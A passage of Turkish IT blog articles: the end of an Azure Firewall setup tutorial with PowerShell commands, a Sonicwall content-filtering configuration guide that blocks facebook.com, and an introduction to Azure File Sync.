
$seyhanvmNic=New-AzureRmNetworkInterface-NameseyhanvmNic-ResourceGroupName$RG-Location$Location-SubnetId$FrontEndSubnetId-PublicIpAddressId$seyhanvmpip.Id -NetworkSecurityGroupId$nsg.Id

$seyhanvmConfig=New-AzureRmVMConfig-VMNameseyhanvm-VMSizeStandard_DS1_v2|Set-AzureRmVMOperatingSystem-Windows-ComputerNameseyhanvm-Credential$cred|Set-AzureRmVMSourceImage-PublisherName"MicrosoftWindowsServer"-Offer"WindowsServer"-Skus"2012-R2-Datacenter"-Versionlatest|Add-AzureRmVMNetworkInterface-Id$seyhanvmNic.Id

New-AzureRmVM-ResourceGroupName$RG-Location$Location-VM$seyhanvmConfig

Resim 11

#Yeni bir tane sanal makine oluşturuyoruz.

$BackEndSubnetId=$vnet.Subnets[2].Id

$ServerVmNic=New-AzureRmNetworkInterface-NameServerVmNic-ResourceGroupName$RG-Location$Location-SubnetId$BackEndSubnetId

$ServerVmConfig=New-AzureRmVMConfig-VMNameServerVm-VMSizeStandard_DS1_v2|Set-AzureRmVMOperatingSystem-Windows-ComputerNameServerVm-Credential$cred|Set-AzureRmVMSourceImage-PublisherName"MicrosoftWindowsServer"-Offer"WindowsServer"-Skus"2012-R2-Datacenter"-Versionlatest|Add-AzureRmVMNetworkInterface-Id$ServerVmNic.Id

New-AzureRmVM-ResourceGroupName$RG-Location$Location-VM$ServerVmConfig

Resim12

#Azure Firewall oluşturuyoruz.

$GatewayName=$RG+"Azfw"

$Azfw=New-AzureRmFirewall-Name$GatewayName-ResourceGroupName$RG-Location$Location-VirtualNetworkName$vnet.Name -PublicIpName$LBPip.Name

Resim 13

# *microsoft.com alan adları için kural oluşturuyoruz.

$Azfw=Get-AzureRmFirewall-ResourceGroupName$RG

$Rule=New-AzureRmFirewallApplicationRule-NameR1-Protocol"http:80","https:443"-TargetFqdn"*microsoft.com"

$RuleCollection=New-AzureRmFirewallApplicationRuleCollection-NameRC1-Priority100-Rule$Rule-ActionType"Allow"

$Azfw.ApplicationRuleCollections =$RuleCollection

Set-AzureRmFirewall-AzureFirewall$Azfw

Resim 14

#Gerekli olan route ayarlarını gerçekleştiriyoruz.

$Azfw=Get-AzureRmFirewall-ResourceGroupName$RG

$AzfwRouteName=$RG+"AzfwRoute"

$AzfwRouteTableName=$RG+"AzfwRouteTable"

$IlbCA=$Azfw.IpConfigurations[0].PrivateIPAddress

$AzfwRoute=New-AzureRmRouteConfig-Name$AzfwRouteName-AddressPrefix0.0.0.0/0-NextHopTypeVirtualAppliance-NextHopIpAddress$IlbCA

$AzfwRouteTable=New-AzureRmRouteTable-Name$AzfwRouteTableName-ResourceGroupName$RG-location$Location-Route$AzfwRoute

Resim 15

#Yazmış olduğumuz route kuralını sunucuların olduğu vnet'e atama işlemini gerçekleştiriyoruz.

$vnet.Subnets[2].RouteTable =$AzfwRouteTable

Set-AzureRmVirtualNetwork-VirtualNetwork$vnet

Resim 16

Daha sonrasında sunucu networkümüz içerisine dahil olan sunucu üzerinde internet sayfası erişimleri kontrol ediyoruz.

Resim 17

Gördüğünüz gibi *microsoft.com alan adı hariç diğer sayfalara erişim engellenmiş durumda.

Resim 18

Bu makalemizde Azure Firewall nedir? Kurulum ve konfigürasyonunu nasıl yapılırı anlatmış olduk. Umarım faydalı bir makale olmuştır. Bir sonraki makalemizde görüşmek dileğiyle.

Bu makalede sonicwall içerik filtreleme servisinden bahsedeceğim. Sonicwall CFS 4.0 ile birlikte pek çok yenilik getirilerek geliştirilmiştir. Sonicwall içerik filtreleme servisi ile belirlenen web sitelerine erişimi engelleyebilir, bir şifre ile doğrulama yaparak izin verebilir, girilecek sayfa için bandwidth uygulayabilir ve İsteğe bağlı olarak bazı kullanıcı ya da grupları bu servisten hariç tutabilirsiniz.

Sonicwall Content Filter Service(CFS) Yapılandırma

Bu makalede sonicwall içerik filtreleme servisinden bahsedeceğim. Sonicwall CFS 4.0 ile birlikte pek çok yenilik getirilerek geliştirilmiştir.

Content Filter Servisinin aktif edilmesi

Sol menüden "Security Services / Content Filter" sayfasında “Enable Content Filtering Service" ve "Enable HTTPS Content Filtering" seçenekleri için ilgili kutucuklar işaretlenir ve Accept butonu tıklanarak CFS servisi aktif edilir.

CFS Exclusion

CFS servisinden hariç tutulacak kişileri tanımlamak için kullanılır. "Exclude Administrator" seçeneği sonicwall ara yüzüne admin olarak bağlanacak kişinin CFS servisinden hariç tutulmasını sağlar. "Excluded Address" girilen adress object ya da address object group'un CFS servisinden hariç tutulmasını sağlar.

CFS Yapılandırma

CFS servisinde yapılandırmaları yeniden kullanılabilir ve yönetmesi kolay hale getirmek için üç nesne (object) tanıtılır. Bunlar aşağıdaki gibidir.

-URI List Objects,

-CFS Action Objects,

-CFS Profile Objects.

Bu nesneler Firewall / Content Filter Object sayfasında yapılandırılır. Bir CFS policy oluşturmak için önce bu nesneler yapılandırılmalıdır.

URI List Objects

URI list objects bir CFS profile objects tarafından kullanılmak üzere oluşturulur. Add butonu tıklanarak yeni bir liste oluşturulur. URI'leri listeye ekler ve bu listeyi CFS profile object bölümünde izin verilen veya yasaklanan liste olarak gösteririz. Ayrıca, * .google.com gibi URI dizesinde joker karakter "*" desteklenir.

Biz burada facebook için yasaklama yapacağız. URI list için bir isim belirleyip URI olarak ise facebook.com adresini ekleyip kaydediyoruz.

CFS Action Objects

Action object, CFS'nin filtrelendikten sonra paketi nasıl ele alacağını tanımlar. Action object bölümünde "Add" butonu tıklanarak yeni action object oluşturulabilir veya varsayılan action object kullanılabilir. Kullanıcı CFS kuralına takıldığında görüntülenecek block page sayfası için HTML kodları isteğe bağlı olarak özelleştirilebilir.

Wipe Cookies: Bu seçenek işaretlendiğinde HTTP isteğindeki çerezler gizliliği korumak için kaldırılacaktır.

Not: Tüm bu seçenekler sadece HTTP isteği için desteklemektedir. HTTPS isteği için DPI-SSL ile birlikte kullanılması gerekir.

CFS Action Object desteklenen eylemler:

-Block: WEB site erişimini engeller. Bağlantı engellendiğinde görüntülenecek engelleme sayfası HTML kodlardan özelleştirilebilir veya varsayılan haliyle kullanılabilir. Bloklama sayfasında "here" linki tıklandığında bu WEB sitenin hangi yasaklı kategorilere takıldığını gösteren bir sayfaya yönlendirecektir.

-Passphrase :WEB sayfasına erişim için şifre girilmesini sağlar. Bu özellik ayarlandığında kuraldan etkilenen kullanıcı ilgili web siteye erişmek istediğinde aşağıdaki sayfa ile karşılaşacaktır. Belirlenen şifre girildikten sonra erişim izni verilecektir.

-Confirm:WEB siteye erişilmek istendiğinde onay sayfası görüntülenir. Kullanıcının "Continue" seçeneğini tıklayarak devam edebileceği ve bunun loglanacağı bilgisi verilir.

BWM: Kullanıcılara, bandwidth politikalarının uygulanmasını sağlar.

Not:Bu özelliklerden biri CFS Action Object bölümünde ayarlandıktan sonra CFS profile object yapılandırılırken yine bu özellik seçilmelidir.

CFS Profile Object

CFS profile object, her bir HTTP / HTTPS bağlantısı için ne tür bir işlem tetikleneceğini tanımlar ve CFS policy tarafından kullanılır.

CFS Profile Objects bölümünde Add butonu tıklanır. Açılan CFS profile oluşturma sayfasında bu profil için bir isim verilir.

Forbidden URI List yasaklı listeyi işler. burada önceden oluşturduğumuz "URI List Objects" seçilir.

Allowed URI List izinli listeyi işler. Bir izinli listesi oluşturulmuş ise burada gösterilebilir ya da none olarak seçilebilir.

WEB sitenin hangi kategorilere girdiği tespit edildikten sonra o kategorileri yasaklamak için "block " seçeneği seçilir.

Yasaklanmak istenen WEB sitenin hangi kategoriye girdiği bilinmelidir. Hangi kategoriye girdiğini sorgulamak için “Security Services / Content Filter" sayfasında en altta "here" seçeneğine tıklanır. Açılan sayfada site ismi girilerek sorgulama yapılır.

Örneğin; facebook.com aşağıdaki kategorilere girmektedir.

Category 31:  Web Communications

Category 58:  Social Networking

CFS Policy Oluşturma

Son olarak oluşturduğumuz CFS profili bir CFS policy'e tanımlarız. Bu default olarak tanımlı CFS default policy olabileceği gibi Add butonu tıklanarak yeni bir CFS policy oluşturulabilir.

Ben burada yeni bir CFS policy oluşturacağım. CFS policy oluşturmak için Securty Services / Content Filter sayfasına gidilir.

İlgili alanlar doldurulduktan sonra OK butonu tıklanarak kaydedilir. Eğer kullanıcıların öncelikli olarak default CFS policy dışında bir kurala takılmalarını istiyorsanız bu kuralın priority değerini değiştirerek üst sıraya almanız gerekir. Source address kısmında gösterilenlerin dışındaki kullanıcılar otomatik olarak CFS default policy kuralını baz alacaktır. Eğer bir domain yapısı var ise buradaki kullanıcıların oluşturulan CFS policy kuralından etkilenmeleri için ilgili grup User/Group bölümünde gösterilmelidir.

Artık kullanıcılar facebook 'a gitmek istediklerinde ilgili CFS kuralına takılacaktır.

Umarım faydalı bir makale olmuştur. Bir sonraki makalemde görüşmek üzere.

Bilişim sektörünün her zaman öncelikli iş yükleri vardır. Bunların en başında güvenlik gelmesine karşın bunun ile ilişkili olarak yedekleme başlığı da belki güvenlik işe eş değer bir konudur. Bunun en temel nedeni ise her ne kadar en yeni nesil güvenlik ürünlerini veya teknolojilerini kullanıyorsanız dahi olsa günün sonunda zero day başta olmak üzere bir şekilde zafiyete uğrama ihtimaliniz vardır. Böyle bir durumda mutlaka bir prosedürünüz ve bu prosedürü işletecek bilgili personeliniz olmalıdır. Bu prosedürün içerisinde ise yedekleme başlığını göreceksiniz. Daha basit bir örnek vermek gerekir ise ransomware gibi zararlıların şirket bilgisayarlarına bulaması ve tüm verileri şifrelemesi gibi bir zafiyet durumunda eğer elinizde bir yedeğiniz var ise aslında durumu ucuz atlatmış oluyorsunuz. Tabiki bilgi güvenliği balı başına bir konu, ne yazık ki Dünya üzerinde o kadar değerli veriler var ki kötü niyetli kişiler şirket sistemlerine sızdığı zaman ransomware gibi kendini belli eden bir aksiyon yerine veri hırsızlığını da tercih edebiliyorlar.

Peki bu girişi konuya nasıl bağlayacaksın diye merak edenler olabilir? Aslında anlatacağım Azure File Sync teknolojisi de yedekleme teknolojilerine benzer dosya replikasyon ürünüdür.

Ürünü anlatmadan önce sizlere hızlıca Azure File nedir sorusunun cevabını vermek istiyorum.

Azure File, bir endüstri standarttı olan “Server Message Block SMB” protokolü ile ulaşabileceğimiz ve aynı on-prem sistemlerdeki gibi klasik bir dosya paylaşımı imkanını bulut üzerinden sunan bir özelliktir. Daha kısa bir ifade ile bulut üzerinde kullanılan dosya paylaşım platformu diyebiliriz.

On-prem üzerindeki bir sunucu üzerinde nasıl bir dosya paylaştırıyorsak azure üzerinde de benzer bir şekilde dosya paylaştırıp buraya SMB protokolü ile on prem veya bulut üzerindeki sistemlerden erişebiliyoruz.

Windows, macOS ve Linux gibi işletim sistemleri de sorunsuz bir şekilde erişim sağlayabilirler.

Buradaki en önemli özelliklerden biriside böyle bir dosya sistemi için ama Windows ortamında ana NAS üzerinde mutlaka bir yönetim eforu sarf etmeniz gerekmesiydi. Yani yerleşik sistemlerdeki bir Windows dosya sunucusu için yedekleme, ulaşılabilirlik veya yama yönetimi gibi bakım işlemleri varken Azure File için bu tür bir derdiniz olmuyor. Hem HA yani sürekli olarak ulaşılabilir olması hem de bakım maliyetlerinin olmaması Azure File’ ı bir hayli üstün bir dosya sunucusu haline getiriyor. Tabiki en büyük sorun network bant genişliklerinin sınırlı olması. Ama konumuz da zaten bu. Yani Azure File Sync ile bunu nasıl aşacağımız.

Peki neden hala dosya sunucularına ihtiyaç duyuyoruz? Onedrive, dropbox, sharepoint online veya aklınıza gelebilecek pek çok bulut dosya sistemi olmasına karşın? Temelde alışkanlıklar gelse de özellikle büyük dosyalar için gecikmeler çok ciddi can sıkıcı olabilmektedir.

Peki Microsoft Azure File gibi bir ürünü geliştirirken neye dikkat etti? Aslında yerleşik dosya sunucularının sorunlarını müşterilerden dinledi. Eminim ki bu sorunların pek çoğunu dosya sunucusu kullanan sizlerde yaşıyorsunuzdur.

1 – Çok dazla eski ve kullanılmayan verinin barındırılması

2 – Kapasite yönetiminin zor olması

3 – Disaster planlarında kapasite kaynaklı limitasyonlar veya zorluklar

4 – Yedekleme ve geri dönme zorlukları

Peki Azure File Sync Nedir?

Yukarıda da bahsettiğim gibi aslında Azure File ile hayatımız bir hayli kolaylaşıyor. Dosya sunucusu kullanıyoruz ancak bakımı, yedeklenmesi veya erişilebilirliği ile ilgilenmiyoruz. Ancak bir istemcinin veya sunucunun direkt olarak azure üzerinden okuması veya yazması ister istemez sorun. Özellikle büyük boyutlu dosyalar ile çalışanlar için bu gecikmeler bir hayli can sıkıcı olabilir. Microsoft buradaki müşteri deneyimini arttırmak için Azure File Sync servisini çıkardı.

Temel olarak yerleşik Windows server sunucuların üzerindeki bir agent sayesinde yerleşik sunucu üzerindeki dosyalar ile azure file paylaşımlarının eşitlenmesini esas almaktadır.

İstemciler yerel dosya sunucularına hızlı bir şekilde erişip dosyaları güncellerken arka planda agent sayesinde dosya sunucusu tüm bu güncellemeleri buluta replike etmektedir.

Özellikle yukarıdaki gibi şubeli bir yapı için inanılmaz bir kolaylık sağlamaktadır.

Peki sistem nasıl çalışıyor?

Aslında yukarıda görüldüğü gibi pek çok senaryosu var. Öncelikle sağ alt köşeden başlarsak eğer bir ofisinizin olduğunu düşünün, burada bulunan bir sunucu üzerine agent yükleyerek öncelikle tüm klasörleri buluta aktarmış oluyorsunuz. Eğer olası bir sunucu sorunu yaşanır ise yine aynı ofis ortamına yeni bir sunucu kurup bulut üzerindeki tüm verileri tekrar on-prem’ e çekebiliyorsunuz. Hatta Sync Group olarak isimlendirdiğimiz ve makalemin ikinci bölümünde detaylı anlatacağım aynı eşitleme grubuna başka bir bölgedeki örneğin yukarıdaki şekle göre “HQ Server” yani merkezdeki dosya sunucusunun da ekleyebilirsiniz. Böyle bir yapıda iki sunucuda master mode’ da çalışır, yani her ikisi de güncellemeye yapabilir durumdadır.

Veya mevcut bu dosya paylaşımını yine azure üzerinde başka bir bölgedeki veri merkezinde açtığınız dosya paylaşımı ile eşitleme şansına sahipsiniz. Yani Batı Amerika veri merkezindeki açtığınız azure dosya paylaşımını azure file sync servisi sayesinde Avrupa’da ki bir veri merkezindeki yine bir dosya paylaşımı ile eşitleyebilirsiniz. Tabiki bu eşitlemenin en büyük yararı olası bir felaket anında otomatik failover sayesine verilerinize hala ulaşabiliyor olmanız olacaktır.

Ek olarak geleneksel erişim yöntemleri olan SBM, NFS ve mobil cihazların yerleşik dosya sunucularındaki dosyalara erişmek için HTTPS protokolünü kullandığı bir model olan work folder desteği de sunulmaktadır.

Ve tabiki olmazsa olmaz hali hazırda azure üzerindeki tüm kaynaklarınızdan bu dosyalara SMB veya REST ile ulaşabilirsiniz.

Son olarak ise Azure Backup sayesinde tabiki tüm bu dosyalarınızı yedekleyebilirsiniz.

Peki kullanım senaryoları nelerdir?

Temel kullanım senaryoları aşağıdaki gibi olup tabiki her kurumun ihtiyacına göre farklılık göstermektedir;

Multi-site sync

Verilerinizi birden çok konumda eşit olarak saklayabilirsiniz.

Cloud tiering

Yerel sunucularda yalnızca son zamanlarda erişilen verileri depolayarak aslında dosya sunucuları için ayrılan kaynakları azaltmış olursunuz.

Direct cloud Access

Yerleşik sistemlerdeki veya bulut ortamındaki tüm uygulama ve serişler için aynı veriyi kullandırabilirsiniz.

Integrated cloud backup

Yerel dosyalarımız için bile azure yedekleme, snapshot ve benzeri özellikleri kullanabiliyor olmamız.

Rapid file server DR

Dosya paylaşımları için en önemli konu namespace kavramıdır, yani uygulama veya servislerin ulaşacağı yolu, ismi biliyor olması. Olası bir felaket anında tüm verinin restore edilmesini beklemeden namespace bilgisi ile veriler ayrı tutulduğu için geleneksel yedekleme ve geri dönme sistemlerine göre çok daha hızlı bir erişim sağlamaktadır.

Evet umarım Azure File Sync konusunda sizlere yeterince detaylı bilgi verebilmişimdir. Makalemin ilk bölümünün sonuna geldim. İkinci bölümde ise tahmin edebileceğiniz gibi bu konuda adım adım uygulamalı bir anlatım gerçekleştireceğim. Ancak yorucu bir Kıbrıs etkinliğinden sonra ancak bu kadarını yetiştirebildim.

Bir sonraki makalemde görüşmek dileği ile esenlikler dilerim.

Kaynak

https://www.youtube.com/watch?v=r26jWDGF_rg